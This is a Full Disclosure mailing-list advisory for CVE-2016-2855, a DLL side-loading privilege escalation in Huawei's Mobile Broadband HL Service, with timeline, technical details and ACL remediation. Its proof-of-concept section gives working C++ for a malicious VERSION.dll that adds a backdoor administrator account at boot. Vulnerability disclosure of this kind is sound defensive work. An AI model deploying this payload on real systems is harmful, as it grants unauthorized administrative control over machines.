Huawei Mobile Broadband HL Service Local Privilege Escalation Metadata =================================================== Release Date: 12-05-2016 Author: Florian Bogner @ Kapsch BusinessCom AG (https://www.kapsch.net/kbc) Affected versions: up to the current 22.001.25.00.03 on x86 and x64 Tested on: Windows 7 32 bit and 64 bit CVE : CVE-2016-2855 URL: https://bogner.sh/2016/05/cve-2016-2855-huawei-mobile-broadband-hl-service-local-privilege-escalation/ Video: https://youtu.be/MwtjE2PmEJU Vulnerability Status: Fixed
Abstract
===================================================
The Windows service "Mobile Broadband HL Service" as installed by many? Huawei
3G/LTE modems is vulnerable to a DLL side loading attack allowing normal
unprivileged users to gain full SYSTEM access.
Disclosure Timeline
===================================================
6.3.2016: Issue privately reported to Huawei
6.3.2016: CVE number requested
7.3.2016: MITRE assigned CVE-2016-2855
14.3.2016: Huawei verified the issue and is working on a fix
9.5.2016: Huawei informed me that the issue has been fixed in their latest
release. However it is up to the carriers to push the fix to the devices.
Technical Details
===================================================
The service executable for the "Mobile Broadband HL Service" service is located
in "C:\ProgramData\MobileBrServ". As the file permissions of this folder allow
normal users to add files a malicious local attacker can drop a DLL named
VERSION.dll into this folder. During the next boot this DLL is loaded and
executed as part of the service launch. This causes a Local Privilege
Escalation as this service is run as LOCAL SYSTEM.
Proof of Concept
===================================================
#include <process.h>
/*
To compile 32bit dll:
cl.exe /D_USRDLL /D_WINDLL version.cpp /link /DLL /OUT:version.dll
Put into C:\ProgramData\MobileBrServ and reboot your system -> a new
user will be added
*/
/* export all required functions - use Dependency Walker to check what is
needed */
extern "C"
{
__declspec(dllexport) int GetFileVersionInfoA();
__declspec(dllexport) int GetFileVersionInfoSizeA();
__declspec(dllexport) int VerQueryValueA();
}
/*
Implement DLLMain with common datatypes so we don't have to include
windows.h.
Otherwise this would cause several compile errors because of the
already known but reexported functions.
*/
int DllMain(void* hinst, unsigned long* reason, void* reserved) {
system("cmd /c \"echo>%tmp%\\dll_loaded\""); // cmd /c
"echo>%tmp%\dll_loaded"
system("net user attacker Batman42 /add");
system("net localgroup Administrators attacker /add");
return 0;
}
/* Implement stubs of our exports */
int GetFileVersionInfoA() {
return 0;
}
int GetFileVersionInfoSizeA() {
return 0;
}
int VerQueryValueA() {
return 0;
}
Suggested Solution
===================================================
The correct solution to prevent this attack is so change the filesystem ACLs so
that normal users are prohibited from creating files and directories within the
C:\ProgramData\MobileBrServ folder.
Workaround
===================================================
Until Huawei pushes a fix the filesystem ACLs should be updated manually to
prevent normal users to write anything into the service directory
(C:\ProgramData\MobileBrServ). This can be automated using icacls.exe.
smime.p7s
Description: S/MIME cryptographic signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
